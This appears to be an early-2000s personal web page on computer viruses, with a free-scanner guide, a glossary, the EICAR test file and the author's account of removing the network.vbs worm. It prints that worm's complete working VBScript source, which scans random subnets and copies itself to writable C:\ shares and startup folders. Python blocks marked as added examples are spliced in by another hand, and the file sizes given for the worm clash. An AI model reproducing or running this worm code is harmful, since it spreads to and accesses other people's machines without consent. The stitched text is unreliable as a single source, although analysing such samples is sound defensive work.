
COMPUTER VIRUSES

Scroll down to view information about the following:

  1. how to have HouseCall scan your computer for viruses while you are online, for free.
  2. e-mail viruses
  3. spam
  4. a glossary of virus terms
  5. a harmless test virus
  6. the virus file I removed from my own hard drive, how I viewed the code written in the virus file, what the virus was designed to do, and how little it affected my computer.

To have your computer scanned for viruses, just visit www.antivirus.com/ (it's free).

  1. If you want an explanation first, read http://www.antivirus.com/free_tools/ and www.antivirus.com/vinfo/.
  2. If not, just click on this link to http://housecall.antivirus.com/housecall/start_pcc.asp and HouseCall will immediately begin the process of checking your computer for viruses. Try not to get alarmed when it starts running automatically (via an ActiveX control) after you click on this link.
  3. Be patient for a few minutes even if HouseCall takes a while to load its web page and download its free virus checking program. Select the hard drives you want scanned for viruses. I do not select AUTO CLEAN because I want to examine the construction of any virus found. Relax and read a book while HouseCall scans all the files on the hard drives you select.
  4. HouseCall will display its report after it finishes scanning your hard drive. If HouseCall finds a virus on your computer, do not push the panic button. Just calm down and read HouseCall's explanations about the virus it found and how you can remove the virus from your computer (I removed one).
  5. If you have time, read www.guardcentral.com/ about computer security.

E-MAIL viruses

If you receive an e-mail with an attached file from an unknown source, simply delete it. Viruses and Trojan programs must have code that is executed in order to infect. If you "double-click" an attached file on an e-mail message, you are executing code and may infect your machine. (Note: Newer antivirus software is capable of scanning these attachments before they are opened.)


SPAM

More about Spam is at http://www.antivirus.com/cybercontent/spamFAQ.htm

Do not try to unsubscribe: many spammers use the reply options to confirm the validity of the e-mail address.

Set your filters in Outlook or your e-mail application to file or delete spam-like mail. Try blocking e-mail with words in the header or the body such as "Free" or "Money" or "Sex." Information on Filtering can be found at Spam Abuse Net.

Register with Network Abuse Clearinghouse http://abuse.net/ and report all spam through their remailer service.

Forward spam to Trend's spam collectors at spam@trendmicro.com so that they can update filters that block new spam messages.


Glossary of Virus Terms (scroll down for definitions)

ActiveX malicious code
Aliases
Boot sector viruses
Date of origin
Description
Destructive viruses
ELF
Encrypted viruses
File infecting viruses
In-the-Wild virus list
Java malicious code
Joke programs
Language
Malware
Macro virus
NE
Password
Payload
PE
Place of origin
Platform
Risk rating
Size
Script viruses
Solution
Tech details
Trigger condition/date
Trojan
Virus types
Worm


ActiveX malicious code
ActiveX controls allow Web developers to create interactive, dynamic Web pages with broader functionality such as HouseCall, Trend Micro's free on-line scanner. An ActiveX control is a component object embedded in a Web page which runs automatically when the page is viewed. In many cases, the Web browser can be configured so that these ActiveX controls do not execute by changing the browser's security settings to "high." However, hackers, virus writers, and others who wish to cause mischief or worse may use ActiveX malicious code as a vehicle to attack the system. To remove malicious ActiveX controls, you just need to delete them.

Aliases
There is no commonly accepted industry standard for naming viruses and malicious mobile code. Each may be known by several different names or aliases. See virus types for an explanation of Trend Micro virus-naming conventions.

Boot sector viruses
Boot sector viruses infect the boot sector or partition table of a disk. Computer systems are most likely to be attacked by boot sector viruses when you boot the system with an infected disk in the floppy drive; the boot attempt does not have to be successful for the virus to infect the hard drive. Also, there are a few viruses that can infect the boot sector from executable programs; these are known as multi-partite viruses and they are relatively rare. Once the system is infected, the boot sector virus will attempt to infect every disk that is accessed by that computer. In general, boot sector viruses can be successfully removed.

Date of origin
Indicates when a virus was first discovered (if known).

Description
This is a brief summary of a virus listed in the Trend Virus Encyclopedia. For detailed technical information, click on the "Tech Details" tab.

Destructive viruses
In addition to self-replication, computer viruses may have a routine that delivers the virus payload. A virus is defined as destructive if its payload does some damage to your system, such as corrupting or deleting files, formatting your hard drive, or committing denial-of-service attacks.

ELF
ELF refers to Executable and Link Format, which is the well-documented and available file format for Linux/UNIX executables. Trend products detect malicious code for Linux/UNIX as "ELF_Virusname."

Encrypted viruses
Indicates that the virus code contains a special routine that encrypts the virus body to evade detection by antivirus software. Trend Micro’s antivirus products have the ability to decrypt the virus body and detect such viruses.

File infecting viruses
File infecting viruses infect executable programs (generally, files that have extensions of .com or .exe). Most such viruses simply try to replicate and spread by infecting other host programs, but some inadvertently destroy the program they infect by overwriting some of the original code. A minority of these viruses are very destructive and attempt to format the hard drive at a pre-determined time or perform some other malicious action. In many cases, a file-infecting virus can be successfully removed from the infected program. If the virus has overwritten part of the code, the original file will be unrecoverable.

In-the-Wild virus list
The In-the-Wild virus list is a list of the most common viruses that have been found infecting users’ computers worldwide. The list is compiled by the renowned antivirus researcher Joe Wells. Wells updates the list regularly, working closely with antivirus research teams around the world, including Trend Micro’s. When ICSA (International Computer Security Association) conducts virus testing of antivirus products, the In-the-Wild virus list serves as the basis for its comparative analysis. More info: http://www.wildlist.org

Java malicious code
Java applets allow Web developers to create interactive, dynamic Web pages with broader functionality. Java applets are small, portable Java programs embedded in HTML pages. They can run automatically when the pages are viewed. However, hackers, virus writers, and others who wish to cause mischief may use Java malicious code as a vehicle to attack the system. In many cases, the Web browser can be configured so that these applets do not execute by changing the browser's security settings to "high."

Joke programs
Joke programs are ordinary executable programs. They are added to the detection list because they are found to be very annoying and/or they contain pornographic images. Joke programs cannot spread unless someone deliberately distributes them. To get rid of a Joke program, delete the file from your system.

Language
This refers to the language locale of the virus working platform such as MS Word in English or Chinese.

Malware
Malware is a general term used to refer to any unexpected or malicious program or mobile code, such as viruses, Trojans, worms, or joke programs.

Macro virus
Macro viruses are viruses that use another application's macro programming language to distribute themselves. They infect documents such as MS Word or MS Excel. Unlike other viruses, macro viruses do not infect programs or boot sectors - although a few do drop programs on the user's hard drive. The dropped files may infect executable programs or boot sectors. Macro viruses can be removed safely from the infected document using Trend Micro’s antivirus products.

Special note: Occasionally, you may get an "illegal operation" error when you try to start MS Word after cleaning a Word macro virus. If this happens, search for the file "normal.dot" and rename it to "normaldot.bak." MS Word will generate a new, clean "normal.dot" the next time it is started. This problem occurs because some viruses can leave harmless code residue that MS Word may be reading incorrectly, causing erratic behavior. Trend antivirus software only removes malicious viral code and not user-created macros.

NE
NE refers to New Executable, which is the standard Windows 16-bit executable file format. Windows 16-bit viruses are detected by Trend products as "NE_Virusname."

Password
Some viruses set a password when they infect a document. The main objective of the virus here is to make the document inaccessible. This password can be a word, phrase, or even a randomly generated number.

Payload
A virus’ payload is an action it performs on the infected computer. This can be something relatively harmless like showing messages or ejecting the CD drive, or something destructive like deleting the entire hard drive.

PE
PE refers to Portable Executable, which is the standard Win32 executable file format. Windows 32-bit viruses are detected by Trend products as "PE_Virusname."

Place of origin
Indicates where a virus is believed to have originated (if known).

Platform
Indicates the computer operating system or application on which a virus can run and perform an infection. Generally, a particular operating system is required for executable viruses and a specific application is needed for macro viruses.

Risk rating
The risk rating of a virus is an assessment of the threat posed by that virus. It is based on a number of different factors including, but not limited to, its potential to spread, the destructiveness of its payload, and the actual number of cases reported.

Size of macro/malicious code/virus
Indicates the size of the virus code in bytes. This number is sometimes used as part of the virus name to distinguish it from its variants.

Script viruses (VBScript, JavaScript, HTML)
Script viruses are written in script programming languages, such as VBScript and JavaScript. VBScript (Visual Basic Script) and JavaScript viruses make use of Microsoft's Windows Scripting Host to activate themselves and infect other files. Since Windows Scripting Host is available on Windows 98 and Windows 2000, the viruses can be activated simply by double-clicking the *.vbs or *.js file from Windows Explorer.

HTML viruses use the scripts embedded in HTML files to do their damage. These embedded scripts automatically execute the moment the HTML page is viewed from a script-enabled browser.

Solution
Most viruses can be cleaned or removed from the infected host files by Trend’s antivirus software. Special removal instructions are provided for viruses or Trojans that modify the system registry and/or drop files. Generally, to remove Trojans or Joke programs, you just need to delete the program files - no cleaning action is needed.

For a quick check-up of your PC, use HouseCall - Trend Micro's FREE on-line virus scanner. This will check for viruses which may already be on your PC.

To keep your computer healthy by catching viruses before they have a chance to infect your PC or network, get the best antivirus solution available today. Trend Micro offers antivirus and content security solutions for home users, corporate users, and ISPs.

Technical details
The "technical details" section of a Virus Encyclopedia profile contains specific information about the actions performed by a virus on the host system. This information is provided to assist system administrators in identifying and removing viruses. Home users should use an automated tool like Trend PC-cillin or Trend’s FREE online scanner – HouseCall – to detect and remove viruses from their computer.

Trigger condition or date
Indicates the condition or date on which the virus’ payload will be triggered. Please note that date-activated viruses may infect your computer 365 days a year: your computer may be infected by these viruses prior to the date specified.

Trojan
A Trojan horse is a program that performs some unexpected or unauthorized, usually malicious, actions such as displaying messages, erasing files or formatting a disk. A Trojan horse doesn’t infect other host files, thus cleaning is not necessary. To get rid of a Trojan, simply delete the program.

Virus types
Viruses and other malware are classified into various types depending on their file formats and infection routines. To distinguish among these types, Trend Micro uses the following prefixes:

ActiveX malicious code - ATVX
Boot sector viruses - no prefix
COM and EXE file infectors - PE, NE, or no prefix
Executable and Link format - ELF
Joke programs - JOKE
Java malicious code - JAVA
Macro viruses - W2KM, W97M, X97M, P97M, A97M, WM, XM, V5M
Trojan horses - TROJ
VBScript, JavaScript or HTML viruses - VBS, JS, HTML
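The PE, NE and ELF entries above, and the prefix table, turn on how a scanner tells the three executable formats apart. The added example below (not Trend Micro code, and not from the original page) shows the header checks involved: an ELF file starts with the bytes 7F 45 4C 46, while both PE and NE files start with a DOS "MZ" stub whose field at offset 0x3C (e_lfanew) points at the newer header, which begins with "PE\0\0" for Win32 or "NE" for Win16. The sample headers are constructed in the block for demonstration; they are not real programs.

```python
import struct

# Classify raw executable bytes into the formats named in the glossary
# (PE = Win32, NE = Win16, ELF = Linux/UNIX) and map them to the Trend-style
# detection prefix. Added example; sample headers below are constructed.

def classify_executable(data: bytes) -> str:
    """Return 'PE', 'NE', 'ELF', 'MZ' (plain DOS) or 'unknown' for raw bytes."""
    if data[:4] == b"\x7fELF":
        return "ELF"
    if data[:2] != b"MZ":
        return "unknown"
    if len(data) < 0x40:
        return "MZ"  # DOS header too short to carry e_lfanew
    # e_lfanew: little-endian offset of the new-format header, at 0x3C
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return "MZ"  # offset points outside the file; treat as plain DOS
    sig4 = data[e_lfanew:e_lfanew + 4]
    if sig4 == b"PE\0\0":
        return "PE"
    if sig4[:2] == b"NE":
        return "NE"
    return "MZ"

def trend_prefix(fmt: str) -> str:
    """Detection-name prefix for the format, per the glossary (none for DOS/COM)."""
    return {"PE": "PE_", "NE": "NE_", "ELF": "ELF_"}.get(fmt, "")

def build_mz_sample(new_sig: bytes) -> bytes:
    """Construct a minimal MZ stub whose e_lfanew points at new_sig (test data only)."""
    header = bytearray(b"MZ" + b"\0" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", header, 0x3C, 0x40)     # new header starts right after it
    return bytes(header) + new_sig + b"\0" * 16

# Constructed samples, one per format the glossary distinguishes
SAMPLES = {
    "pe_sample": build_mz_sample(b"PE\0\0"),
    "ne_sample": build_mz_sample(b"NE"),
    "elf_sample": b"\x7fELF\x02\x01\x01" + b"\0" * 9,
    "dos_sample": b"MZ" + b"\0" * 0x3E,  # e_lfanew = 0 points back at "MZ": plain DOS
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        fmt = classify_executable(blob)
        print(f"{name}: {fmt} -> prefix {trend_prefix(fmt) or '(none)'}")
```

The e_lfanew bounds check matters in practice: a truncated or deliberately malformed stub can point past the end of the file, and a classifier that indexes blindly would raise or misreport instead of falling back to "MZ".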

Worm
A computer worm is a self-contained program (or set of programs) that is able to spread functional copies of itself or its segments to other computer systems. The propagation usually takes place via network connections or email attachments. To get rid of a worm you just need to delete the program.


A HARMLESS TEST VIRUS

The EICAR Standard Antivirus Test File can be downloaded from http://www.antivirus.com/vinfo/testfiles/

The EICAR organization or European Institute of Computer Anti-virus Research, along with antivirus vendors, has developed this test file to assist users in testing their installations of antivirus software. It is recommended that vendors detect this file.

This is NOT A VIRUS. The file is a test file which may be used to test antivirus software. The code is harmless, and when it is detected properly the virus scanner will display the following message: EICAR-TEST-FILE
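A quick way to use the test file the way EICAR intends is to write it to disk and watch whether the installed scanner reacts. The following is an added example (not from the original page, and not EICAR's or Trend Micro's code): it embeds the published 68-character EICAR test string, writes it to a temporary directory, and reports whether an on-access scanner removed or quarantined the file within a timeout. The timeout value and the file name eicar.com are assumptions for this example; the string itself is plain text, not a virus.

```python
import os
import tempfile
import time

# The published EICAR test signature: 68 printable ASCII bytes. It is a
# harmless text string that antivirus products agree to detect.
EICAR = (b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
         b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*")

def eicar_bytes() -> bytes:
    """Return the test string after checking it matches the published form."""
    assert len(EICAR) == 68, "EICAR string must be exactly 68 bytes"
    assert all(32 <= b < 127 for b in EICAR), "printable ASCII only"
    return EICAR

def write_eicar(directory: str, name: str = "eicar.com") -> str:
    """Write the test file into directory and return its path."""
    path = os.path.join(directory, name)
    with open(path, "wb") as fh:
        fh.write(eicar_bytes())
    return path

def scanner_removed_file(path: str, timeout: float = 10.0, poll: float = 0.5) -> bool:
    """True if the file disappears (deleted or quarantined) before the timeout."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if not os.path.exists(path):
            return True
        time.sleep(poll)
    return not os.path.exists(path)

if __name__ == "__main__":
    # Assumed workflow: write the file, then give the on-access scanner a few seconds.
    with tempfile.TemporaryDirectory() as workdir:
        test_path = write_eicar(workdir)
        if scanner_removed_file(test_path):
            print("scanner reacted: test file was removed")
        else:
            print("test file still present: no on-access scanner caught it")
```

If the file survives, that does not prove the scanner is broken: some products only flag the file on a scheduled or on-demand scan, so run HouseCall or the product's manual scan on the directory before drawing a conclusion.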


HOW I REMOVED A VIRUS FROM MY COMPUTER

A free scan of my computer by www.antivirus.com found on the C:\ drive of my computer a "Non Cleanable" virus in the following three directories:

  1. C:\WINDOWS\StartMenu\Programs\Startup\network.vbs
  2. C:\WINDOWS\network.vbs
  3. C:\network.vbs

I found an identical virus file in all three of the above directories and deleted them after I opened one in Notepad to view its English-language code.


The following information about the network.vbs virus came from www.netvirus.com

VBS_NETLOG.WORM
Risk rating:
Virus type: VBScript
Destructive: N

Aliases:
NETLOG.WORM , NETWORK.VBS

Description:
This Trojan when run searches for a computer in the network where c:\ is shared with full control and accesses files. This virus does not run on Windows NT environment.

Solution:
Please delete the file "network.vbs" located in directories where it was added. You may also disconnect mapping of the network drive to ensure complete safety.

If you need further assistance with this solution, please send an email to virus_doctor@trendmicro.com.

Trend Micro offers best-of-breed antivirus and content-security solutions for your corporate network or home PC.


VBS_NETLOG.WORM (continued from profile page)

In the wild: Yes
Trigger date 1: Any Day
Payload 1: Others (drops files in directories)
Payload 2: Others (accesses files with full shared control in network)
Detected by pattern file#: 659
Detected by scan engine#: 2.082
Language: English
Platform: Windows
Encrypted: No
Size of virus: 2,429 Bytes

Details:
Upon execution, this Trojan checks for the file “network.log” in the c:\ drive, then it writes the text “Log file Open” to this file. It then writes in this log file random addresses with the text:
“Subnet : <Random number 1>.<Random number 2>.<Random number 3>.0”
where:
Random number 1 is a number between 199 and 214
Random numbers 2 and 3 are numbers between 1 and 254

Then the malware picks a random address for it to scan. After this, the virus checks for a computer in a network wherein the shared format of c:\ is full control. It then maps the c:\ of the infected computer as j:\.

The Trojan also adds the following line to the log file “network.log” for every drive it has mapped:
“Copying files to : <share name>”
and checks the first network.vbs file it copies and then writes to the log:
“Successful copy to : <share name>” if the copy is successful.

After mapping c:\ to j:\, it copies the file network.vbs to the following locations:
J:\windows\startm~1\programs\startup\
J:\windows\
J:\windows\start menu\programs\startup\
J:\win95\start menu\programs\startup\
J:\win95\startm~1\programs\startup\
J:\win95\

When the infected computer reboots, the virus runs because it is at the startup directory. With this the hacker can access all the files in c:\.

The form of lookup by this worm can also act as a Distributed Denial of Service (DDOS) attack since the queries the virus performs can overwhelm a server until all requests cannot be serviced anymore, thereby crashing the system.


Two HouseCall reports about my own hard drive

HouseCall informed me it could not access the files listed below. Please note that there is the potential of virus infection in files HouseCall cannot scan.

(I just left some of these files alone because I was not sure what would happen to my computer if I deleted them.)

First report time : 2001/01/15 00:01:54
File Name Type Message
C:\WINDOWS\HELP\windows.GID File Fail to scan file (-89,Skip this file)
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar *META-INF\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\WINDOWS\WIN386.SWP File Fail to scan file (-94,Open file for data reading error)
C:\Program Files\Juno\lib\juno.GID File Fail to scan file (-89,Skip this file)
C:\Program Files\Juno\lib\CONTACT.GID File Fail to scan file (-89,Skip this file)
C:\Program Files\NetZero\lib\bwt300.jar *META-INF\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\bwt300.jar ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\Zcast1_6.zip *META-INF\* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\servlet.jar *META-INF\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\servlet.jar ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\JavaSoft\JRE\1.2\lib\plugprov.jar *META-INF\* File Fail to scan file (-82,The Compressed file is corrupted)
C:\1\ANCESTRY\LYLES\MAILTEXT\allofus.zip ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\1\3\NEW\Juno\lib\juno.GID File Fail to scan file (-89,Skip this file)
C:\America Online 5.0\aol.GID File Fail to scan file (-89,Skip this file)
C:\WINDOWSWinHlp32.BMK File Fail to scan file (-89,Skip this file)

Second report time : 2001/01/17 16:13:32
C:\WINDOWS\HELP\windows.GID File Fail to scan file (-89,Skip this file)
C:\WINDOWS\WIN386.SWP File Fail to scan file (-94,Open file for data reading error)
C:\Program Files\Juno\lib\juno.GID File Fail to scan file (-89,Skip this file)
C:\Program Files\Juno\lib\CONTACT.GID File Fail to scan file (-89,Skip this file)
C:\Program Files\NetZero\lib\bwt300.jar *META-INF\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\bwt300.jar ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\Zcast1_6.zip *META-INF\* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\servlet.jar *META-INF\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\NetZero\lib\servlet.jar ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\Program Files\JavaSoft\JRE\1.2\lib\plugprov.jar *META-INF\* File Fail to scan file (-82,The Compressed file is corrupted)
C:\1\ANCESTRY\LYLES\MAILTEXT\allofus.zip ** File Fail to scan file (-82,The Compressed file is corrupted)
C:\1\3\NEW\Juno\lib\juno.GID File Fail to scan file (-89,Skip this file)
C:\America Online 5.0\aol.GID File Fail to scan file (-89,Skip this file)
C:\WINDOWSWinHlp32.BMK File Fail to scan file (-89,Skip this file)
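The files in these reports are the ones the scanner could not look inside, and the corrupted .jar and .zip archives are the entries a practitioner would want to isolate, since their contents are simply unknown. The following added example (not Trend Micro's code, and not from the original page) parses report lines of the form "<path> File Fail to scan file (<code>,<message>)", counts them by error code, and lists the distinct archives that went unscanned. The sample report in the block is a short excerpt modelled on the lines above, and the archive extensions it recognises are an assumption for this example.

```python
import re
from collections import Counter

# Parser for HouseCall "Fail to scan file" lines. Added example; the sample
# report is a constructed excerpt modelled on the reports above.

LINE_RE = re.compile(
    r"^(?P<path>.+?) File Fail to scan file \((?P<code>-?\d+),(?P<msg>[^)]*)\)\s*$"
)
ARCHIVE_EXT = (".jar", ".zip")  # assumed list of container types worth isolating

SAMPLE_REPORT = """First report time : 2001/01/15 00:01:54
File Name Type Message
C:\\WINDOWS\\HELP\\windows.GID File Fail to scan file (-89,Skip this file)
C:\\WINDOWS\\WIN386.SWP File Fail to scan file (-94,Open file for data reading error)
C:\\Program Files\\NetZero\\lib\\bwt300.jar *META-INF\\MANIFEST.MF* File Fail to scan file (-82,The Compressed file is corrupted)
C:\\1\\ANCESTRY\\LYLES\\MAILTEXT\\allofus.zip ** File Fail to scan file (-82,The Compressed file is corrupted)
"""

def parse_report(text):
    """Return one dict per unscanned-file line: raw path, container file, code, message."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # timestamp and column-header lines carry no file entry
        raw = m.group("path")
        # Archive members appear as "<archive> *<member>*" or "<archive> **"
        container = raw.split(" *", 1)[0]
        records.append({
            "path": raw,
            "file": container,
            "code": int(m.group("code")),
            "message": m.group("msg").strip(),
        })
    return records

def count_by_code(records):
    """Error code -> number of entries skipped with that code."""
    return dict(Counter(r["code"] for r in records))

def unscanned_archives(records):
    """Distinct archives the scanner could not open, in report order."""
    seen = []
    for r in records:
        if r["file"].lower().endswith(ARCHIVE_EXT) and r["file"] not in seen:
            seen.append(r["file"])
    return seen

if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    print("skipped entries:", len(recs))
    print("by error code:", count_by_code(recs))
    for archive in unscanned_archives(recs):
        print("archive not scanned:", archive)
```

An archive the scanner reports as corrupted may simply be a non-standard zip the engine cannot parse, but until it is re-created from a trusted source or scanned by a tool that can open it, it should be treated as unverified rather than clean.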

HOW I VIEWED THE INTERNAL STRUCTURE
OF THE VIRUS HOUSECALL FOUND ON MY COMPUTER

After I transferred one copy of the three identical 237KB VBScript files named "network.vbs" to a folder I named VIRUS in my Documents folder, I right clicked on the file name "network.vbs" with my mouse to view its Properties. I changed the Property of the file from Read Only so I could edit it with Notepad (Properties also revealed that the "network.vbs" virus file was created on September 28, 1999 and modified Sunday January 9, 2000). After I examined the contents of the file, I deleted them and then deleted the file, which contained the following instructions (which might be used to recreate the virus).

dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
randomize
checkfile()
randaddress()

do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop

msgbox "Done"

function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function

function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function

function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")

fso.copyfile "c:\network.vbs", "j:\"

If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
End If

fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\windows\"

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"

fso.copyfile "c:\network.vbs", "j:\wind95\"

end function

function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function

function shareformat()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function

function randum()
rand = int((254 * rnd) + 1)
end function

function randaddress()
if count <50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function


WHAT THE VIRUS DID TO MY COMPUTER

My C:\network.log file contained the information below, some or all of which was written there by the virus program, according to the description above. I opened the file in Notepad and changed its attribute from "Archive" to see if I could delete any of the following information (not that I need to), but failed (maybe the MS-DOS editor could change it).

Log file Open
Subnet : 204.235.96.0
Subnet : 214.236.191.0
Subnet : 207.181.47.0
Subnet : 214.78.187.0
Subnet : 209.88.46.0
Subnet : 201.141.92.0
Subnet : 199.69.133.0
Subnet : 208.244.120.0
Subnet : 199.225.212.0
Subnet : 200.150.39.0
Subnet : 209.221.172.0
Subnet : 200.156.56.0
Subnet : 206.150.224.0
Subnet : 202.73.206.0
Subnet : 202.128.212.0
Subnet : 201.95.149.0
Subnet : 201.203.3.0
Subnet : 204.43.49.0
Subnet : 210.193.108.0
Subnet : 200.102.8.0
Subnet : 214.140.198.0
Subnet : 210.166.127.0
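The profile's "Details" section and the log above together describe everything network.log can tell an administrator after an infection: which /24 ranges the worm enumerated, which C:\ shares it tried to write to, and which copies it confirmed. The following added example (not from the original page, and not Trend Micro's code) parses a network.log into those three lists, checks whether the subnet entries follow the worm's described pattern (first octet 199 to 214 for the first 50 entries), and extracts the hosts that actually received a copy so they can be cleaned first. The sample log in the block is constructed: its subnet lines are taken from the log above, and the "Copying files to" and "Successfull copy to" lines (the worm's own spelling) are made-up entries in the format the profile describes.

```python
import ipaddress
import re

# Triage parser for the c:\network.log file VBS_NETLOG.WORM writes.
# Added example; the sample log below is constructed from the line formats
# given in the worm profile, with made-up share addresses.

SUBNET_RE = re.compile(r"^Subnet : (\d{1,3})\.(\d{1,3})\.(\d{1,3})\.0$")
COPY_RE = re.compile(r"^Copying files to : (\\\\[\d.]+\\C)$")
OK_RE = re.compile(r"^Successfull copy to : (\\\\[\d.]+\\C)$")  # worm's spelling

SAMPLE_LOG = """Log file Open
Subnet : 204.235.96.0
Subnet : 214.236.191.0
Copying files to : \\\\214.236.191.7\\C
Successfull copy to : \\\\214.236.191.7\\C
Subnet : 207.181.47.0
Copying files to : \\\\207.181.47.12\\C
"""

def parse_network_log(text):
    """Return scanned /24 subnets, share paths written to, and confirmed copies."""
    result = {"subnets": [], "copy_attempts": [], "confirmed_copies": []}
    for line in text.splitlines():
        line = line.strip()
        if m := SUBNET_RE.match(line):
            result["subnets"].append(".".join(m.groups()) + ".0")
        elif m := COPY_RE.match(line):
            result["copy_attempts"].append(m.group(1))
        elif m := OK_RE.match(line):
            result["confirmed_copies"].append(m.group(1))
    return result

def looks_like_netlog_pattern(subnets):
    """True if the first 50 subnets all have a first octet in 199..214, as described."""
    head = subnets[:50]
    return bool(head) and all(199 <= int(s.split(".")[0]) <= 214 for s in head)

def victims_to_notify(parsed):
    """IP addresses of hosts whose C:\\ share received network.vbs."""
    hosts = []
    for share in parsed["confirmed_copies"]:
        host = share[2:].split("\\", 1)[0]      # strip leading \\ and trailing \C
        hosts.append(str(ipaddress.ip_address(host)))  # validates the address
    return hosts

if __name__ == "__main__":
    parsed = parse_network_log(SAMPLE_LOG)
    print("subnets enumerated:", len(parsed["subnets"]))
    print("matches VBS_NETLOG pattern:", looks_like_netlog_pattern(parsed["subnets"]))
    print("copy attempts:", parsed["copy_attempts"])
    print("hosts to clean first:", victims_to_notify(parsed))
```

A "Copying files to" line without a matching "Successfull copy to" line means the worm reached a writable share but the copy was not confirmed, so those hosts still deserve a check of the startup folders listed in the profile before they are ruled out.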